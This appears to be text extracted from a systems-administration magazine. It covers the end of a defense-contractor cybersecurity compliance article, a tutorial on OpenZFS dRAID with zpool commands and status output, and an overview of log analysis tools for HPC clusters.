A company's goal should not just be to achieve eligibility to win defense contracts, but also to minimize business risk and keep CUI out of the hands of adversaries. By getting started on your organization's compliance journey, you can achieve these objectives and ensure your company is ready for ramped-up federal enforcement of cybersecurity regulations.

Info
[1] Defense federal acquisition regulation supplement: assessing contractor implementation of cybersecurity requirements (DFARS case 2019-D041). 85 Federal Register 61505 (Sep 2020), 18 p., [https://www.federalregister.gov/documents/2020/09/29/2020-21123/defense-federal-acquisition-regulation-supplement-assessing-contractor-implementation-of]
[2] Safeguarding covered defense information and cyber incident reporting (Dec 2019). DFARS 252.204-7012 (Sep 2022), [https://www.acquisition.gov/dfars/252.204-7012-safeguarding-covered-defense-information-and-cyber-incident-reporting]
[3] "What Is the NIST SP 800-171 and Who Needs to Follow It?" by Traci Spencer. NIST, Oct 8, 2019, [https://www.nist.gov/blogs/manufacturing-innovation-blog/what-nist-sp-800-171-and-who-needs-follow-it-0]
[4] Basic safeguarding of covered contractor information systems. FAR 52.204-21 (Oct 2022), [https://www.acquisition.gov/far/52.204-21]
[5] "Strategic Direction for Cybersecurity Maturity Model Certification (CMMC) Program." US DoD release, Nov 4, 2021, [https://www.defense.gov/News/Releases/Release/Article/2833006/strategic-direction-for-cybersecurity-maturity-model-certification-cmmc-program/]
[6] "DOD launches CMMC 2.0 program; Jesse Salazar quoted" by Jane Edwards. GovConWire, Nov 5, 2021, [https://www.govconwire.com/2021/11/dod-launches-cmmc-2-0-program/]
[7] "Stacy Bostjanick shares updated DoD CMMC rollout schedule" by Summer Myatt. GovConWire, May 20, 2022, [https://www.govconwire.com/2022/05/dods-cmmc-director-stacy-bostjanick-shares-updated-rollout-schedule/]

Author
Christopher J. Cowen is currently a Senior Cyber Security Analyst with the US Department of Defense (contractor). He has worked within information technology for more than 20 years within both the corporate and government spaces. He is currently focused on information security for nuclear facilities and critical infrastructure security. Cowen is a Certified Information Systems Security Professional (CISSP), a Certified Ethical Hacker (CEH), and a Certified Information Security Manager (CISM). He has been a featured speaker all over the world and has written articles for Cyber Defense Magazine and Cyber Security: A Peer-Reviewed Journal, among others. You can reach Chris at [chrisjcowen@yahoo.com].

NUTS AND BOLTS dRAID

Introducing parity declustering RAID

Silverware
Declustered RAID decreases resilvering times, restoring a pool to full redundancy in a fraction of the time required by traditional RAIDz. We look at OpenZFS, the first freely distributed open source solution to offer a parity declustered RAID feature. By Petros Koutoupis

Fault tolerance has been at the forefront of data protection since the dawn of computing. To this day, admins continue to struggle with efficient and reliable methods to maintain the consistency of stored data, either locally or remotely on a server (or cloud storage pool) and keep searching for the best way to recover from a failure, regardless of how disastrous that failure might be.
Some of the methods still being used today are considered ancient by today's standards. Why replace something that continues to work? One such technology is called RAID. Initially, the acronym stood for redundant array of inexpensive disks, but it was later reinvented to describe a redundant array of independent disks.
The idea of RAID was first conceived in 1987. The primary goal was to scale multiple drives into a single volume and present it to the host as a single pool of storage. Depending on how the drives were structured, you also saw an added performance or redundancy benefit. (See the box titled "RAID Recap.")
RAID technology isn't perfect. As drive capacities increase and storage technologies move further away from movable components and closer to persistent memory, RAID is starting to show its age and limitations, which is why its algorithms continue to be improved.
Papers on declustering the parity of RAID 5 or 6 arrays date back to the early 1990s. The design aims to enhance the recovery performance of the array by shuffling data among all drives within the same array, including its assigned spare drives, which tend to sit idle until failure occurs. Figure 2 showcases a very simplified logical layout of each stripe across all participating volumes. In practice, though, the logical layout is arranged randomly to distribute data chunks more evenly over the drives (and based on their logical offsets). It is done in such a way that, regardless of which drive fails, the workload to recover from the failure is distributed uniformly across the remaining drives. Figure 3 highlights a simplified example of how this is exercised with the OpenZFS project, as discussed later in this article.

Why Parity Declustering?

When a traditional redundant array fails and data needs to be rebuilt to a spare drive, two major things occur:
• Data access performance drops significantly. In parallel with user read and write requests (which involve rebuilding the original data stripe from the existing calculated parities, consuming more processing power), a background process is initiated to rebuild the original (and newly updated) data to the designated spare drive(s). This process creates a bottleneck to the spare drive.
• As a result of both activities occurring simultaneously, the recovery process will take much longer to complete. Depending on the user workload and capacity sizes, we are talking about days, weeks, even months. In the interim, however, you have the risk of a secondary (or tertiary) drive failing; depending on the RAID type, it can put your array into an extremely vulnerable state – if not


cripple the entire array and render your data unrecoverable.
By leveraging parity declustering, all drives within the array, including the spares, participate in the data layout with specific regions of a stripe dedicated as the spare chunks. When the time comes to regenerate and recover lost data because of a drive failure, all drives participate in the recovery process and, in turn, do not bottleneck a single drive (i.e., the spare). This method means a reduced rebuild time, and when the existing array is under a heavier user workload, this matters.

OpenZFS dRAID

How does one take advantage of this approach to data management? Fortunately, in a fairly recent joint vendor and community effort, the OpenZFS [1] project introduced parity declustering. The implementation, called distributed RAID (dRAID), was released in OpenZFS version 2.1 [2].
As an example, to configure a single-parity dRAID volume with a single spare on five drives, you would use the zpool command-line utility:

# zpool create -f myvol2 draid:3d:1s:5c /dev/sd[b-f]

In this example, if you want dual or triple parity, you would instead

RAID Recap
RAID allows you to pool multiple drives together to represent a single volume. Depending on how the drives are organized, you can unlock certain features or advantages. For instance, depending on the RAID type, performance can dramatically improve, especially as you stripe and balance the data across multiple drives, thus removing the bottleneck of using a single disk for all write and read operations. Again, depending on the RAID type, you can grow the storage capacity.
Most of the RAID algorithms do offer some form of redundancy that can withstand a finite number of drive failures. In such a situation, when a drive fails, the array will continue to operate in a degraded mode until you recover it by rebuilding the failed data to a spare drive.
Most traditional RAID implementations use some form of striping or mirroring (Figure 1). With a mirror, one drive is essentially a byte-by-byte image of the other(s). Striping, on the other hand, retrieves data and writes or reads it across all drives of the array in a stripe. In this method, data is written to the array in chunks, and collectively, all chunks within a stripe define the array's stripe size.
Common RAID types include:
RAID 0 – Disk striping. Data is written in chunks across all drives in a stripe, typically organized in a round-robin fashion. Both read and write operations access the data in the same way, and because data is constantly being transferred to or from multiple drives, bottlenecks associated with reading and writing to a single drive are alleviated, and data access performance is dramatically improved. However, RAID 0 does not offer redundancy. If a single drive or drive sector fails, the entire array fails or is immediately invalidated.
RAID 1 – Disk mirroring. In a RAID 1 array, one drive stores an exact replica of its companion drive, so if one drive fails, the second immediately steps in to resume where the first left off. Write performance tends to be half of a single drive because you are literally writing two copies of the same dataset (one to each drive). If designed properly, however, read performance can double through a mechanism called read balancing. Read requests can be split across both drives in the mirrored set so that each drive does half the work to retrieve data.
RAID 5/6 – Redundancy. Here is where things get a bit more complicated. RAID levels 5 and 6 are similar to RAID 0, except they offer a form of redundancy. Across each stripe of chunks exists a chunk dedicated to an XOR-calculated parity of all the other chunks within that same stripe. This special chunk is then balanced across all drives in the array, so that no single drive bears the burden of continuously writing parity updates every time a stripe is updated. These parity calculations make it possible to restore the original data content when a drive fails or becomes unavailable. A RAID 5 volume contains a single parity chunk per stripe. A RAID 6 volume is designed with two parity chunks per stripe, allowing it to sustain two drive failures.
Although not the focus of this article, hybrid RAID types are worth a mention. Typically hybrid types involve nesting one RAID type within another. For instance, striping mirrored sets is considered RAID 10, but if the striping includes a single parity (e.g., RAID 5), it is referred to as RAID 50.
RAID systems can be either hardware or software based. Once upon a time, processing power was limited, and it was advantageous to rely on external hardware for creating and managing RAID arrays. As time progressed, this approach became less significant. Server hardware grew more powerful, and implementing RAID solutions became much easier and less expensive through software with commodity storage drives attached to the server. However, hardware-based, vendor-specific storage arrays still exist, and they offer some additional fault tolerance and performance features that are advantageous in some settings.
Figure 1: A general outline of RAID levels 0, 1, and 5.
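The XOR parity scheme described in the box can be sketched in a few lines of Python. This is an illustration of the arithmetic only, not OpenZFS code, and the chunk contents are made up:

```python
# RAID 5-style parity: the parity chunk is the XOR of all data chunks in a
# stripe, so any single missing chunk can be recomputed from the others.
from functools import reduce

def parity(chunks):
    """Compute the XOR parity chunk for equal-sized data chunks."""
    return bytes(reduce(lambda a, b: a ^ b, col) for col in zip(*chunks))

def reconstruct(survivors, parity_chunk):
    """Rebuild the single lost chunk from the surviving chunks plus parity."""
    return parity(survivors + [parity_chunk])

stripe = [b"AAAA", b"BBBB", b"CCCC"]      # three data chunks in one stripe
p = parity(stripe)
rebuilt = reconstruct([stripe[0], stripe[2]], p)   # "lose" the second chunk
assert rebuilt == b"BBBB"
```

The same XOR property is why a single-parity array survives exactly one drive failure: with two chunks missing from a stripe, the parity equation no longer has a unique solution.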


substitute draid with draid2 or draid3. The next colon-delimited field defines the number of data drives (in this case, three), then the number of spare drives, and finally the total number of children. If executed without error, zpool status would output something like Listing 1. For reference purposes, with a traditional single-parity RAIDz pool and a single spare, the output would look something like Listing 2. Notice that in the dRAID example, all drives, including the spare, are active in the pool, whereas in the RAIDz example, a single spare drive remains idle until a failure occurs.
To exercise this feature, you will need to "fail" a drive; the quickest way to do so is to take it offline by the storage subsystem in sysfs (in Linux):

# echo offline > /sys/block/sdf/device/state

When the drive failure is detected on the next I/O operation to the pool, the distributed spare space will step in to resume where the failed drive left off (Listing 3).
The next step is to take the failed drive from the ZFS pool offline to simulate a drive replacement:

# zpool offline myvol2 sdf
# echo running > /sys/block/sdf/device/state
# zpool online myvol2 sdf

A resilver (resyncing, or rebuilding, a degraded array) is initiated across all drives within the pool (Listing 4).

Conclusion

The OpenZFS project is the first freely distributed open source storage management solution to offer a parity declustered RAID feature. As stated earlier, the biggest advantage to using dRAID is that resilvering times are greatly reduced over the traditional RAIDz, and restoring the

Figure 2: A simplified RAID 5 with a spare layout compared with a parity declustered layout.
Figure 3: A simplified dRAID layout compared with RAIDz. © OpenZFS project
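The colon-delimited vdev layout described above can be decoded mechanically. The short Python sketch below is purely illustrative (the real parsing lives inside ZFS) and assumes the documented defaults of parity 1 and zero spares when a field is omitted:

```python
# Decode a dRAID vdev name such as "draid1:3d:5c:1s" into its layout fields:
# parity level, data drives per redundancy group, total children, and spares.
import re

def parse_draid(name):
    m = re.fullmatch(r"draid(\d?)((?::\d+[dcs])*)", name)
    if not m:
        raise ValueError(f"not a dRAID vdev name: {name}")
    layout = {"parity": int(m.group(1) or 1), "data": None,
              "children": None, "spares": 0}
    field = {"d": "data", "c": "children", "s": "spares"}
    for num, kind in re.findall(r":(\d+)([dcs])", m.group(2)):
        layout[field[kind]] = int(num)
    return layout

print(parse_draid("draid1:3d:5c:1s"))
# {'parity': 1, 'data': 3, 'children': 5, 'spares': 1}
```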


pool back to full redundancy can be accomplished in a fraction of the time. As drive capacities continue to increase, this feature alone will continue to show its value.

Info
[1] OpenZFS Project page: [https://www.openzfs.org]
[2] OpenZFS dRAID documentation: [https://openzfs.github.io/openzfs-docs/Basic%20Concepts/dRAID%20Howto.html]

Author
Petros Koutoupis is a senior performance software engineer at Cray (now HPE) for its Lustre High Performance File System division. He is also the creator and maintainer of the RapidDisk Project ([www.rapiddisk.org]). Petros has worked in the data storage industry for well over a decade and has helped to pioneer many of the technologies unleashed in the wild today.

Listing 1: dRAID zpool status

# sudo zpool status
  pool: myvol2
 state: ONLINE
config:

        NAME                 STATE     READ WRITE CKSUM
        myvol2               ONLINE       0     0     0
          draid1:3d:5c:1s-0  ONLINE       0     0     0
            sdb              ONLINE       0     0     0
            sdc              ONLINE       0     0     0
            sdd              ONLINE       0     0     0
            sde              ONLINE       0     0     0
            sdf              ONLINE       0     0     0
        spares
          draid1-0-0         AVAIL

errors: No known data errors

Listing 2: RAIDz zpool status

# zpool status
  pool: myvol1
 state: ONLINE
config:

        NAME        STATE     READ WRITE CKSUM
        myvol1      ONLINE       0     0     0
          raidz1-0  ONLINE       0     0     0
            sdb     ONLINE       0     0     0
            sdc     ONLINE       0     0     0
            sdd     ONLINE       0     0     0
            sde     ONLINE       0     0     0
        spares
          sdf       AVAIL

errors: No known data errors

Listing 3: Spare Drive Stepping In

# zpool status
  pool: myvol2
 state: DEGRADED
status: One or more devices could not be used because the label is missing or invalid. Sufficient replicas exist for the pool to continue functioning in a degraded state.
action: Replace the device using 'zpool replace'.
   see: https://openzfs.github.io/openzfs-docs/msg/ZFS-8000-4J
  scan: scrub in progress since Mon Oct 24 17:11:22 2022
        80.7M scanned at 80.7M/s, 133M issued at 133M/s, 81.6M total
        0B repaired, 163.06% done, no estimated completion time
  scan: resilvered (draid1:3d:5c:1s-0) 20.2M in 00:00:00 with 0 errors on Mon Oct 24 17:11:22 2022
config:

        NAME                   STATE     READ WRITE CKSUM
        myvol2                 DEGRADED     0     0     0
          draid1:3d:5c:1s-0    DEGRADED     0     0     0
            sdb                ONLINE       0     0     0
            sdc                ONLINE       0     0     0
            sdd                ONLINE       0     0     0
            sde                ONLINE       0     0     0
            spare-4            DEGRADED     0     0     0
              sdf              UNAVAIL      3   397     0
              draid1-0-0       ONLINE       0     0     0
        spares
          draid1-0-0           INUSE     currently in use

errors: No known data errors

Listing 4: Resilvering

# zpool status
  pool: myvol2
 state: ONLINE
status: One or more devices is currently being resilvered. The pool will continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
  scan: resilver in progress since Mon Oct 24 17:13:44 2022
        15.0G scanned at 3.00G/s, 5.74G issued at 1.15G/s, 15.0G total
        709M resilvered, 38.29% done, 00:00:08 to go
config:

        NAME                   STATE     READ WRITE CKSUM
        myvol2                 ONLINE       0     0     0
          draid1:3d:5c:1s-0    ONLINE       0     0     0
            sdb                ONLINE       0     0     0  (resilvering)
            sdc                ONLINE       0     0     0  (resilvering)
            sdd                ONLINE       0     0     0  (resilvering)
            sde                ONLINE       0     0     0  (resilvering)
            spare-4            ONLINE       0     0     0
              sdf              ONLINE       3   397     0  (resilvering)
              draid1-0-0       ONLINE       0     0     0  (resilvering)
        spares
          draid1-0-0           INUSE     currently in use

errors: No known data errors
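The resilvering speedup has a simple intuition: a classic rebuild funnels every reconstructed block through the one spare drive, whereas dRAID spreads the writes across all surviving drives. A rough back-of-envelope model in Python (the capacity and throughput figures are assumptions for illustration, not measurements):

```python
# Naive rebuild-time model: total data to rewrite divided by the aggregate
# write bandwidth of however many drives share the rebuild work.

def rebuild_hours(capacity_tb, drive_mbps, writers):
    """Hours to rewrite capacity_tb of data with `writers` drives absorbing it."""
    seconds = (capacity_tb * 1e12 / 1e6) / (drive_mbps * writers)
    return seconds / 3600

# A 16TB drive at ~150MB/s sustained:
classic = rebuild_hours(16, 150, writers=1)  # one dedicated spare is the bottleneck
draid = rebuild_hours(16, 150, writers=9)    # e.g., nine survivors share the writes
# classic is roughly 30 hours; draid is under 4 hours in this toy model
```

The model ignores user I/O competing with the rebuild, which only widens the gap in practice, as the article notes.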


Log analysis in high-performance computing

State of the Cluster


Log analysis can be used to great effect in HPC systems. We present an overview of the current log analysis technologies. By Jeff Layton

Gathering logs from distributed systems for manual searching is a typical task performed in high-performance computing (HPC) [1]. Log analysis is important for cybersecurity, understanding HPC cluster behavior, and event and trend analysis. In this article, I address the state of the art in log analysis and how it can be applied to HPC.

Origins

Log analysis can produce information through a variety of functions and technologies, including:
• ingestion
• centralization
• normalization
• classification and logging
• pattern recognition
• correlation analysis
• monitoring and alerts
• artificial ignorance
• reporting
Logs are great for checking the health of a set of systems and can be used to locate obvious problems, such as kernel modules not loading. They can also be used to find attempts to break into systems through various means, including shared credentials. However, these examples do not really take advantage of all the information contained in logs: Log analysis can be used to improve system administration skills.
When analyzing or just watching logs over a period of time, you can get a feel for the rhythm of your systems; for example: When do people log in and out of the system? What kernel modules are loaded? What, if any, errors occur (and when)? The answers to these questions allow you to recognize when things don't seem quite right with the systems (events) that "normal" log analysis might miss. A great question is: Why does user X have a new version of an application? Normal log analysis would not care about this query, but perhaps the user needed a new version, which could indicate that others might also need the newer version, prompting you to build and make it available to all.
Developing an intuition of how a system or, in HPC, systems behave can take a long time and might be impossible to achieve, but it can also be accomplished by watching logs. If you happen to leave or change jobs, a new admin would have to start from scratch to develop this systems intuition. Perhaps you have a better way with the use of log analysis on your HPC systems. Before going there, I'll look at the list of technologies presented at the beginning of this article.

Ingestion and Centralization

The ingestion and centralization step is important for HPC systems because of their distributed nature. Larger systems would use methods that ingest the logs to a dedicated centralized server, whereas smaller systems or smaller logs could use a virtual machine (VM). Of course, these logs need to be tagged with the originating system so they can be differentiated.
When you get to the point of log analysis, you really aren't just talking about system logs. Log ingestion also means logs from network devices, storage systems, and even applications that don't always write to /var/log.
A key factor that can be easily neglected in log collection from disparate systems and devices is the time correlation of these logs. If something happens on a system at a particular time, other systems might have been affected, as well. The exact time of the event is needed to search across logs from other systems and devices to correlate all logs. Therefore, enabling the Network Time Protocol (NTP) [2] on all systems is critical.
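The tagging and time-ordering steps just described can be sketched in a few lines of Python. The log format and hostnames are hypothetical, and a real collector such as rsyslog or syslog-ng does this work for you:

```python
# Tag each ingested line with its originating system and a parsed timestamp,
# then merge the streams into one time-ordered sequence for correlation.
from datetime import datetime

def ingest(host, lines, fmt="%Y-%m-%dT%H:%M:%S"):
    """Turn raw 'timestamp message' lines into tagged records."""
    records = []
    for line in lines:
        stamp, _, message = line.partition(" ")
        records.append({"host": host,
                        "time": datetime.strptime(stamp, fmt),
                        "message": message})
    return records

central = sorted(
    ingest("node01", ["2022-10-24T17:11:22 nfs: server not responding"]) +
    ingest("login1", ["2022-10-24T17:11:20 sshd: accepted publickey for alice"]),
    key=lambda r: r["time"])
# The earlier login1 entry now precedes the node01 entry in the merged stream.
```

Note that the merge is only meaningful if both hosts agree on the time, which is exactly why NTP on every system matters.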


Normalization

Normalization is just what it sounds like: the process of converting all or parts of the log content to the same format – most importantly for items such as the time stamp of the log entry and the IP address.
The tricky bit of normalization is automation. Some logging tools understand formats from various sources, but not all of them. You might have to write a bit of code to convert the log entries into a format suitable for the analysis. The good news is that you only have to do this once for each source of log entries, of which there aren't many.

Classification and Ordering

You can mix all of your logs into a single file or database, but this can make analysis difficult because the logs contain different types of information. For example, a log entry from a user logging onto a system has information that is different from a network storage device logging data throughput over the last five seconds. You can classify the log messages into different classes, add tags to messages with keywords, or use both techniques for better log organization.

Pattern Recognition

Pattern recognition tools are typically used to filter incoming messages (log entries) according to a set of known patterns. This method allows common events to be separated out or handled differently from events that do not fit the pattern.
Although it might sound like you wouldn't have to collect and store so much log information, (1) you have to define the benign patterns, and (2) you can lose quite a bit of information (more on that later in the article).

Correlation Analysis

Correlation analysis is a way to find all of the entries associated with an event, even if they are in different logs or have different tags. This method can be more important than you might think: If a user's application doesn't run as well today as it did yesterday, you have to determine whether any new events occurred before the latest run. More specifically: What happens when a user's application crashes? Do any events in the logs across various devices explain what could have caused this problem?

Monitoring and Alerts

Log analysis tools usually include the ability to notify you about events that might require human intervention. These events can be tied to alerts in various forms, such as email or dashboards, so you are promptly notified. A good simple example is the loss of a stream of events to a system log. This usually requires a human to find out why the stream stopped.
A second example is if environmental properties in a data center go beyond their normal levels. Early in my career a small group of engineers wanted to have a meeting in a data center, so they turned off all of the air conditioning units because they were too loud. As the ambient temperature went above a critical temperature, I got several email messages and a beeper page. (That shows you how long ago it was.)

Artificial Ignorance

Because hardware problems are fairly rare overall, log analysis tools have implemented what they call "artificial ignorance," which uses a machine learning (ML) approach to discard log entries that have been defined as "uninteresting." Commonly, these entries are typical of a system that is operating normally and that don't provide any useful information (however "useful" is defined). The idea is to save log storage by ignoring and even deleting this uninteresting information.
My opinion, with which you can agree or disagree, is that artificial ignorance is not something I would enable for a long time. The uninteresting logs can provide information about how the system typically runs. For example, when do people log in to the system? When do users typically run jobs? A lot of day-to-day activities are important to know but are lost when artificial ignorance is used.
Although keeping or watching everyday activities might seem like Groundhog Day, I feel it is important for understanding the system. Dumping this data before you have a chance to develop this understanding is premature, in my opinion.
Ignoring the uninteresting data could also hinder understanding an event. In the previous section on Correlation Analysis, when an event occurs, you want to gather as much information around that event as possible. Artificial ignorance might ignore log entries that are related to the event but appear to be uninteresting. They could even be deleted, handicapping your understanding of the event.
Lastly, this data can be important for other tasks or techniques in log analysis, as a later section will illustrate.

Reporting

Log analysis tools can create notifications and alerts, but many (most) of the tools can create a report of their analysis, as well. The report is customized to your system and probably your management because you will want to see all system problems – or at the very least, a summary view of the events.
Reports can also be your answer to compliance requests, with all the information needed to prove compliance (or show non-compliance). This feature is critical in Europe, where the General Data Protection Regulation (GDPR) topics are very important. If a request to remove specific data has been made, you must be able to prove that it was done. A log analysis tool should be able to confirm this in a report.

Examples of Log Analysis Stacks and Tools

All of the log analysis tools and stacks are different, flexible, and run in a specific manner. Some are created from various components, usually open source, and others are monolithic tools, so it would be too difficult to examine them all. Rather,

I'm going to focus on a log analysis stack concept that illustrates the tools that fulfill the various tasks described at the beginning of the article. In this way, I hope to orient you in the correct direction for deploying a log analysis capability.

Splunk

Although I'm a big supporter of open source, Splunk [3], a commercial product, is probably the gold standard for a combination log collection and log analysis tool. It is the template security incident and event management (SIEM) tool that all others use for comparison. Honestly, though, Splunk is pretty costly for an HPC system and may be overkill.
Splunk came out in 2003 and was very quickly a big success. Arguably, it was the first enterprise-grade log collection and analysis tool that could monitor logs from many different devices and applications and locate patterns in real time. It also uses machine learning in its analysis, which was very innovative at the time and set the bar for similar tools. Splunk has a great number of features, is easy to install, uses data indices and events, and can ingest data from many sources. For an enterprise-grade tool, all of these features made it unique and powerful.
Sites started using Splunk, and its popularity grew and grew. However, as I mentioned, it's fairly expensive, particularly for HPC systems, which has led to log analysis stacks and tools developed to compete with Splunk but still be open source, less expensive at the very least, or both.

Splunk Alternatives

Given the preeminence of Splunk and the associated cost, people naturally will look for Splunk alternatives [4]. An article about Splunk alternatives presents a few options but is not necessarily comprehensive. From that article, I gleaned a few options:
• LogDNA (commercial with open source agent; software as a service (SaaS))
• Elastic Stack (aka the ELK stack), which includes Elasticsearch (search and analytics engine), Logstash (log collection transformation), Kibana (visualization), and Beats (data shippers, not really part of ELK, but added to Elastic Stack)
• Fluentd (open source)
• Sumo Logic (commercial)
• Loggly (uses open source tools, including Elasticsearch, Apache Lucene, and Apache Kafka)
• Graylog (open and commercial versions)
Most of the open source tool stacks have a company behind them that offers support, proprietary plugins, additional capability, or a combination of features for a price.
Rather than dig into the tools and stacks, I'm going to discuss the ELK stack and its components briefly. This stack was the original open source log analysis stack designed to replace Splunk but has morphed into the Elastic Stack while adding an additional tool, Beats, a collection of data shipper tools.

Elastic Stack (ELK)

ELK stands for Elasticsearch, Logstash, and Kibana and was put together to provide a complete log management and analysis stack that is all open source and competitive with Splunk. The steps or tenets for log collection, management, and analysis and the tools that fulfill these steps in the ELK stack are:
• log collection (Logstash)
• log/data conversion/formatter (Logstash)
• log search/analysis (Elasticsearch)
• visualization (Kibana)
A fourth tool, Beats, a collection of lightweight data shippers, was later added to the stack, which was renamed Elastic Stack.
The ELK stack was a big hit because it was totally open source and provided a good portion of the capability found in Splunk. Its popularity grew quickly and even Amazon Web Services (AWS) offered the ELK stack components as managed services. These components can be used together and with other AWS services. The Elastic company [5] develops the tools in the ELK and Elastic stacks, offers support, and develops commercial plugins.

Gathering the Data

Logstash serves the purpose of gathering and transforming logs from the various servers (classification and ordering) by ingesting the logs or data from the specified sources and normalizing, classifying, and ordering it before sending it to the search engine, which is Elasticsearch in the ELK or Elastic stack.
Installing and configuring Logstash is covered in an article from Elastic [6]. Each client system runs a small tool named Filebeat that collects data from files on that server and sends it to the server that is running Logstash. This tool allows you to specify system logs or the output of any scripts you create or any applications.
Filebeat takes the place of log gathering tools such as syslog-ng or rsyslog in general but isn't strictly necessary. If you have a server already logging to a central log, you can install Filebeat on that server and the logs will be transmitted to the Logstash server as JSON (JavaScript Object Notation), which can be the same server, easing the upgrade from just log collection to log analysis.

Searching the Data

Logstash gathers the logs and transforms them into a form the search engine, Elasticsearch [7], can then consume (JSON). Elasticsearch is an open source tool that is based on the Apache Lucene library [8]. You can configure Elasticsearch to gather whatever information you need or want, but the defaults [9] are a good place to start.
Besides being open source, Elasticsearch has some attractive features. One aspect that HPC users will understand and appreciate is that it is distributed. If you have lots of data and want to improve performance, you can shard data across several servers. Elasticsearch also has near real-time performance, perhaps close


to Splunk's performance, that gives you quick insight into problems and perhaps overcomes them as quickly. While doing the searching, it creates an index for the data that is very useful if you want to see all of the data related to an event, look back at the system logs and data, or both.
The core of Elasticsearch is in Java, but it has clients in various languages, including, naturally, Java, but also .NET (C#), PHP, Apache Groovy, Ruby, JavaScript, Go, Perl, Rust, and Python. These choices provide a great deal of flexibility to Elasticsearch.
In addition to developing all the tools in the stack – Logstash, Elasticsearch, Kibana (more on that in the next section), and Beats – Elastic also created the Elastic Cloud service.

Visualizing the Data

Humans are great pattern recognition engines. We don't do well with text zooming on the screen, but we can pick out patterns in visual data. To help, the tool Kibana [10] ties into Elastic Stack to provide visualization. At a high level, it can create various charts of pretty much whatever you want or need.
Installing Kibana (Figure 1) is easiest from your package manager. If you read through the configuration document, you will see lots of options. I recommend starting with the defaults [11] before changing any of them. The documentation starts with alert and action settings followed by lots of other configuration options.

ELK Stack Wrap Up

Other components plug into the ELK stack. Fortunately, they have been tested and developed somewhat together so they should "just work." Most importantly, however, they fulfill the components of a log analysis system mentioned earlier: log collection, log data conversion and formatter, log search and analysis, and visualization.

AI

In the previous discussion about the technologies used in log analysis, machine learning was discussed – in particular, artificial ignorance, which uses machine learning to ignore and possibly discard log entries before searching the data. Pattern recognition also uses machine learning. As I discussed, although I don't know the details of how the machine learning models make decisions, I am not a big fan of discarding data just because it looks normal. Such data might be very useful in training deep learning models.
A deep learning model uses neural networks to process input to create some sort of output. These networks are trained with sample data for the inputs and have the matching expected output(s). To train such a model adequately, you need a very large amount of data that spans a wide range of conditions.
The data should be balanced according to the desired outputs for non-language models. For example, if you want to identify an image and have defined 10 possible image classes, then the input data should be fairly evenly distributed across each of the 10 classes. You can see the effect of a bad distribution if you run test images through the model and it has difficulty classifying images into a specific class. It might identify a cat as a dog if you don't have enough data, enough data in each class, or a broad enough data set.
If you are interested in special images or events that happen only very rarely, developing an appropriate dataset is very difficult and, as a result, makes it difficult to create an adequately trained model. An example of this is fraud detection. The model is supposed to identify when a fraudulent transaction happens. However, these are very rare events despite what certain news agencies say.
If you take data from transaction processing, you will have virtually the entire dataset filled with non-fraudulent data. Perhaps only a single-digit number of fraudulent transactions are in the dataset, so you have millions of non-fraudulent transactions and maybe three or four fraudulent transactions – most definitely a very unbalanced dataset.
For these types of situations, you invert the problem by creating a model to find the non-fraudulent transactions. Now you have a data set that is useful in creating the model. You are throwing millions of transactions at the model for it to learn with basically one output: Is the transaction fraudulent? A fraudulent transaction will then be relatively

Figure 1: Sample Kibana screenshot (CC BY-SA 4.0).

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 91
NUTS AND BOLTS: Analyzing Logs in HPC

easy for the model to detect. Of course, other approaches will work, but this is a somewhat common approach of training models to detect rare events. Therefore, you shouldn't discard the non-interesting data, because it can be used to train a neural network model that is very useful.
In the case of HPC systems, the trained deep learning model can be used to augment your observations as to the "normal" behavior of a system. If something doesn't seem typical, then the model can quickly notify you. In HPC systems, non-typical events can be infrequent. For example, a user starts logging into the system at a later time than usual or they start running different applications. Therefore, the data set for HPC systems could have a fair number of events, and you don't have to "invert" the model to look for non-events.

NVIDIA Morpheus

I want to mention a new tool from NVIDIA designed for cybersecurity. In full disclosure, I work for NVIDIA as my day job, but I'm not endorsing the product, nor do I have any inside knowledge of the product, so I will use publicly available links. That said, NVIDIA has a new software development kit (SDK) that addresses cybersecurity with neural network models. The SDK, called Morpheus [12], is "… an open application framework that enables cybersecurity developers to create optimized AI pipelines for filtering, processing, and classifying large volumes of real-time data." It provides real-time inferencing (not training) on cybersecurity data. Log analysis looks for cybersecurity-like events and includes actual cybersecurity events. The product web page lists some possible use cases:
• digital fingerprinting
• sensitive information detection
• crypto mining malware detection
• phishing detection
• fraudulent transaction and identity detection
• ransomware
The digital fingerprinting use case "Uniquely fingerprint(s) every user, service, account, and machine across the enterprise data center – employing unsupervised learning to flag when user and machine activity patterns shift," which is great to watch for break-ins on HPC systems but also to watch for shifting patterns. Instead of developing a fingerprint of user behavior, it could be used to create a fingerprint of application versions.
For example, a user might start out using a specific version of an application, but as time goes on, perhaps they use a newer version. This event signals the administrator to install and support the new version and consider deprecating any old versions. This scenario is especially likely in deep learning applications because frameworks develop quickly, new frameworks are introduced, and other frameworks stop being developed.
Another example might be job queues that are becoming longer than usual, perhaps indicating that more resources are needed. A model that detects this event and creates information as to why would be extremely useful.
The framework could also be used to watch data storage trends. Certainly storage space will increase, but which users are consuming the most space or have the most files can be identified and watched in case it is something unusual (like downloading too many KC and The Sunshine Band mp4s to the HPC). There really are no limits to how Morpheus could be used in HPC, especially for log analysis in general.

Summary

Log analysis is a very useful tool for many administration tasks. You can use it for cybersecurity, understanding how an HPC cluster normally behaves, identifying events and trends within the cluster, the need for more resources, or anything you want to learn about the cluster. The use of log analysis in your HPC systems is up to you because it can mean adding several servers and a fair amount of storage to your system. However, don't think of log analysis as just a cybersecurity tool. You can use it for many HPC-specific tasks, greatly adding to the administration of the system. Plus, it can make pretty reports, which management always loves.
The future of log analysis will probably morph into an AI-based tool that takes the place of several of the technologies in current log analysis. Instead of a single trained AI, a federated set of trained networks will probably be used. Other models will likely go back and review past logs, either for training or to create a behavior description of how the cluster operates. This area of HPC technology has lots of opportunities.

Info
[1] "Log Management" by Jeff Layton: [https://www.admin-magazine.com/HPC/Articles/Log-Management]
[2] NTP: [https://en.wikipedia.org/wiki/Network_Time_Protocol]
[3] Splunk: [https://www.splunk.com/en_us/blog/learn/log-management.html]
[4] Splunk alternatives: [https://www.mezmo.com/blog/5-splunk-alternatives-for-logging-their-benefits-shortcomings-and-which-one-to-choose]
[5] Elastic: [https://www.elastic.co/]
[6] Logstash: [https://www.elastic.co/guide/en/logstash/current/getting-started-with-logstash.html]
[7] Elasticsearch: [https://en.wikipedia.org/wiki/Elasticsearch]
[8] Lucene: [https://lucene.apache.org/]
[9] Elasticsearch defaults: [https://www.elastic.co/guide/en/elasticsearch/reference/current/settings.html]
[10] Kibana: [https://en.wikipedia.org/wiki/Kibana]
